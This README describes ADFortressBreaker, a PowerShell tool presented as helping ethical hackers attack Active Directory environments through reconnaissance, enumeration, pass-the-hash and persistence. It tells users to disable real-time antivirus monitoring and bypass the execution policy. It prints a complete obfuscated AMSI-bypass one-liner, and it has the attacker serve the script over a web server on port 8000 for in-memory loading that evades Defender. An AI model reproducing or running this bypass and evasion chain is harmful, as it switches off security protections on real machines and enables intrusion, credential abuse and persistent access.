The script has been written to help Ethical Hackers to execute the most common command in a Penetration Test in an Active Directory environment without write any line of code. It's designed to leave as few traces as possible, so all the module will be loaded directly in memory to avoid defender interception. Remember that all the modules inside the Modules folder will activate your antivirus, so before use it you have to disable real time monitoring or give an exclusion to the path where you will use it.
Before launching AdFortressBreaker it is necessary to bypass powershell execution policy:
powershell -ep bypass
Then you have to bypass the AMSI control:
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Import the module:
. .\ADFortressBreaker.ps1
Execute:
Invoke-ADFortressBreaker
After that the user have to start a web server on port 8000 on his machine.
_____ ______ _ ____ _
/\ | __ \| ____| | | | _ \ | |
/ \ | | | | |__ ___ _ __| |_ _ __ ___ ___ ___| |_) |_ __ ___ __ _| | _____ _ __
/ /\ \ | | | | __/ _ \| '__| __| '__/ _ \/ __/ __| _ <| '__/ _ \/ _ | |/ / _ \ '__|
/ ____ \| |__| | | | (_) | | | |_| | | __/\__ \__ \ |_) | | | __/ (_| | < __/ |
/_/ \_\_____/|_| \___/|_| \__|_| \___||___/___/____/|_| \___|\__,_|_|\_\___|_|
1) Reconnaissance
2) Enumeration
3) PassTheHash
4) Persistence
5) Exit
[*] Start a web server on your machine (exposed on port 8000) to download the .ps1 file
[*} Example: python3 -m http.server
[*] Set the web server ip address :
In the main menu the user can choose the activity to do by typing the corresponding number and pressing enter.
To implement ADFortressBreaker we used the following tools:
This project is under the Commons Clause version of the MIT License license. You can copy, modify, distribute and perform the work for whatever reason, excluding commercial purposes.